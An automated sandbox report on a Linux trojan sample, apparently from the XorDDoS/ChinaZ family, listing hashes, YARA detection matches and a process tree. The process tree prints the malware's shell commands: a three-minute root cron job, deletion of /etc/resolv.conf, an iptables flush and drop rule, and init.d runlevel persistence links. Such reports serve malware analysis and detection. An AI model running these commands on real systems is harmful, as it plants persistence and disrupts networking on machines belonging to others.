Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
Linux4.7.elf

Overview

General Information

Sample Name:Linux4.7.elf
Analysis ID:727219
MD5:b6a59da20064367d4a954123c69345dc
SHA1:2c8b614069440f2476415dd54e4b985c72be3eef
SHA256:09bc639a0192cb829d74d3e64c0333be46aa72f780a7a17ef2adc072d7ed80b3
Tags:ChinaZDDoSelf
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sample tries to persist itself using System V runlevels
Machine Learning detection for dropped file
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Drops invisible ELF files
Executes the "iptables" command to insert, remove and/or manipulate rules
Machine Learning detection for sample
Writes ELF files to disk
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "systemctl" command used for controlling the systemd system and service manager
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Sample has stripped symbol table
Executes the "iptables" command used for managing IP filtering and manipulation
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "touch" command used to create files or modify time stamps
Writes shell script file to disk with an unusual file extension

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:727219
Start date and time:2022-10-21 04:37:08 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 18s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Linux4.7.elf
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal88.troj.evad.linELF@0/5@0/0
Command:/tmp/Linux4.7.elf
PID:6223
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • Linux4.7.elf (PID: 6223, Parent: 6122, MD5: b6a59da20064367d4a954123c69345dc) Arguments: /tmp/Linux4.7.elf
    • Linux4.7.elf New Fork (PID: 6224, Parent: 6223)
      • Linux4.7.elf New Fork (PID: 6225, Parent: 6224)
        • Linux4.7.elf New Fork (PID: 6228, Parent: 6225)
          • update-rc.d (PID: 6229, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d Linux4.7.elf remove
            • systemctl (PID: 6236, Parent: 6229, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • Linux4.7.elf New Fork (PID: 6232, Parent: 6225)
          • update-rc.d (PID: 6233, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d .chinaz{1666327072 defaults
            • systemctl (PID: 6244, Parent: 6233, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • sh (PID: 6234, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"
          • sh New Fork (PID: 6235, Parent: 6234)
          • sed (PID: 6235, Parent: 6234, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/cron.sh/d /etc/crontab
        • sh (PID: 6237, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/resolv.conf"
          • sh New Fork (PID: 6238, Parent: 6237)
          • rm (PID: 6238, Parent: 6237, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/resolv.conf
        • sh (PID: 6241, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c whoami
          • sh New Fork (PID: 6247, Parent: 6241)
          • whoami (PID: 6247, Parent: 6241, MD5: dbc1888ae50bb5d4d9a7a210d51be710) Arguments: whoami
        • sh (PID: 6242, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables --flush"
          • sh New Fork (PID: 6245, Parent: 6242)
          • iptables (PID: 6245, Parent: 6242, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables --flush
        • sh (PID: 6243, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c whoami
          • sh New Fork (PID: 6246, Parent: 6243)
          • whoami (PID: 6246, Parent: 6243, MD5: dbc1888ae50bb5d4d9a7a210d51be710) Arguments: whoami
        • sh (PID: 6252, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch /home/root/ConfigDatecz"
          • sh New Fork (PID: 6254, Parent: 6252)
          • touch (PID: 6254, Parent: 6252, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch /home/root/ConfigDatecz
        • sh (PID: 6253, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A OUTPUT -p tcp --dport 0 -j DROP"
          • sh New Fork (PID: 6257, Parent: 6253)
          • iptables (PID: 6257, Parent: 6253, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A OUTPUT -p tcp --dport 0 -j DROP
  • systemd New Fork (PID: 6256, Parent: 6255)
  • snapd-env-generator (PID: 6256, Parent: 6255, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6272, Parent: 6271)
  • snapd-env-generator (PID: 6272, Parent: 6271, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
SourceRuleDescriptionAuthorStrings
Linux4.7.elfCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Linux4.7.elfLinux_Trojan_Xorddos_a6572d63unknownunknown
  • 0xb80ad:$a: C8 0F B6 46 04 0F B6 56 05 C1 E0 08 09 D0 89 45 CC 0F B6 46 06 0F B6
SourceRuleDescriptionAuthorStrings
/etc/init.d/.chinaz{1666327072CN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
/etc/init.d/.chinaz{1666327072Linux_Trojan_Xorddos_a6572d63unknownunknown
  • 0xb80ad:$a: C8 0F B6 46 04 0F B6 56 05 C1 E0 08 09 D0 89 45 CC 0F B6 46 06 0F B6
SourceRuleDescriptionAuthorStrings
6228.1.0000000008048000.0000000008188000.r-x.sdmpCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
6228.1.0000000008048000.0000000008188000.r-x.sdmpLinux_Trojan_Xorddos_a6572d63unknownunknown
  • 0xb80ad:$a: C8 0F B6 46 04 0F B6 56 05 C1 E0 08 09 D0 89 45 CC 0F B6 46 06 0F B6
6223.1.0000000008048000.0000000008188000.r-x.sdmpCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
6223.1.0000000008048000.0000000008188000.r-x.sdmpLinux_Trojan_Xorddos_a6572d63unknownunknown
  • 0xb80ad:$a: C8 0F B6 46 04 0F B6 56 05 C1 E0 08 09 D0 89 45 CC 0F B6 46 06 0F B6
6226.1.0000000008048000.0000000008188000.r-x.sdmpCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Click to see the 13 entries
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Linux4.7.elfVirustotal: Detection: 60%Perma Link
Source: /etc/init.d/.chinaz{1666327072Joe Sandbox ML: detected
Source: Linux4.7.elfJoe Sandbox ML: detected
Source: /tmp/Linux4.7.elf (PID: 6225)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

Networking

barindex
Source: /bin/sh (PID: 6257)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A OUTPUT -p tcp --dport 0 -j DROPJump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: /bin/sh (PID: 6245)Iptables executable: /usr/sbin/iptables -> iptables --flushJump to behavior
Source: /bin/sh (PID: 6257)Iptables executable: /usr/sbin/iptables -> iptables -A OUTPUT -p tcp --dport 0 -j DROPJump to behavior
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: Linux4.7.elf, .chinaz{1666327072.12.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html

System Summary

barindex
Source: Linux4.7.elf, type: SAMPLEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: Linux4.7.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6228.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6228.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6223.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6223.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6226.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6226.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6231.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6231.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6224.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6224.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6232.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6232.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6225.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6225.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6227.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6227.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: 6230.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6230.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: /etc/init.d/.chinaz{1666327072, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: /etc/init.d/.chinaz{1666327072, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_a6572d63 Author: unknown
Source: Linux4.7.elf, type: SAMPLEMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Linux4.7.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6228.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6228.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6223.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6223.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6226.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6226.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6231.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6231.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6224.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6224.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6232.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6225.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6225.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6227.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6227.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: 6230.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6230.1.0000000008048000.0000000008188000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: /etc/init.d/.chinaz{1666327072, type: DROPPEDMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: /etc/init.d/.chinaz{1666327072, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_a6572d63 reference_sample = 2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0, id = a6572d63-f9f3-4dfb-87e6-3b0bafd68a79, last_modified = 2021-09-16
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal88.troj.evad.linELF@0/5@0/0

Persistence and Installation Behavior

barindex
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc1.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc2.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc3.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc4.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc5.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc.d/rc1.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc.d/rc2.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc.d/rc3.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc.d/rc4.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/rc.d/rc5.d/S90.chinaz{1666327072 -> /etc/init.d/.chinaz{1666327072Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 6233)File: /etc/rc1.d/S01.chinaz{1666327072 -> ../init.d/.chinaz{1666327072Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 6233)File: /etc/rc2.d/S01.chinaz{1666327072 -> ../init.d/.chinaz{1666327072Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 6233)File: /etc/rc3.d/S01.chinaz{1666327072 -> ../init.d/.chinaz{1666327072Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 6233)File: /etc/rc4.d/S01.chinaz{1666327072 -> ../init.d/.chinaz{1666327072Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 6233)File: /etc/rc5.d/S01.chinaz{1666327072 -> ../init.d/.chinaz{1666327072Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/cron.hourly/cron.shJump to behavior
Source: /usr/bin/sed (PID: 6235)File: /etc/crontabJump to behavior
Source: /bin/sh (PID: 6257)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A OUTPUT -p tcp --dport 0 -j DROPJump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)File written: /tmp/.chinaz{1666327072Jump to dropped file
Source: /tmp/Linux4.7.elf (PID: 6225)Shell script file created: /etc/cron.hourly/cron.shJump to dropped file
Source: /tmp/Linux4.7.elf (PID: 6225)Reads from proc file: /proc/meminfoJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6236)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6244)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6245)Iptables executable: /usr/sbin/iptables -> iptables --flushJump to behavior
Source: /bin/sh (PID: 6257)Iptables executable: /usr/sbin/iptables -> iptables -A OUTPUT -p tcp --dport 0 -j DROPJump to behavior
Source: /tmp/Linux4.7.elf (PID: 6234)Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6237)Shell command executed: sh -c "rm -rf /etc/resolv.conf"Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6241)Shell command executed: sh -c whoamiJump to behavior
Source: /tmp/Linux4.7.elf (PID: 6242)Shell command executed: sh -c "iptables --flush"Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6243)Shell command executed: sh -c whoamiJump to behavior
Source: /tmp/Linux4.7.elf (PID: 6252)Shell command executed: sh -c "touch /home/root/ConfigDatecz"Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6253)Shell command executed: sh -c "iptables -A OUTPUT -p tcp --dport 0 -j DROP"Jump to behavior
Source: /bin/sh (PID: 6238)Rm executable: /usr/bin/rm -> rm -rf /etc/resolv.confJump to behavior
Source: /bin/sh (PID: 6254)Touch executable: /usr/bin/touch -> touch /home/root/ConfigDateczJump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)Writes shell script file to disk with an unusual file extension: /etc/init.d/.chinaz{1666327072Jump to dropped file
Source: /bin/sh (PID: 6235)Sed executable: /usr/bin/sed -> sed -i /\\/etc\\/cron.hourly\\/cron.sh/d /etc/crontabJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/Linux4.7.elf (PID: 6225)File: /etc/init.d/.chinaz{1666327072Jump to dropped file
Source: /tmp/Linux4.7.elf (PID: 6225)File: /tmp/Linux4.7.elfJump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)ELF file: /tmp/.chinaz{1666327072Jump to dropped file
Source: /tmp/Linux4.7.elf (PID: 6225)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /tmp/Linux4.7.elf (PID: 6223)Queries kernel information via 'uname': Jump to behavior
Source: /tmp/Linux4.7.elf (PID: 6225)Queries kernel information via 'uname': Jump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Command and Scripting Interpreter
1
Systemd Service
1
Systemd Service
1
Masquerading
OS Credential Dumping1
Security Software Discovery
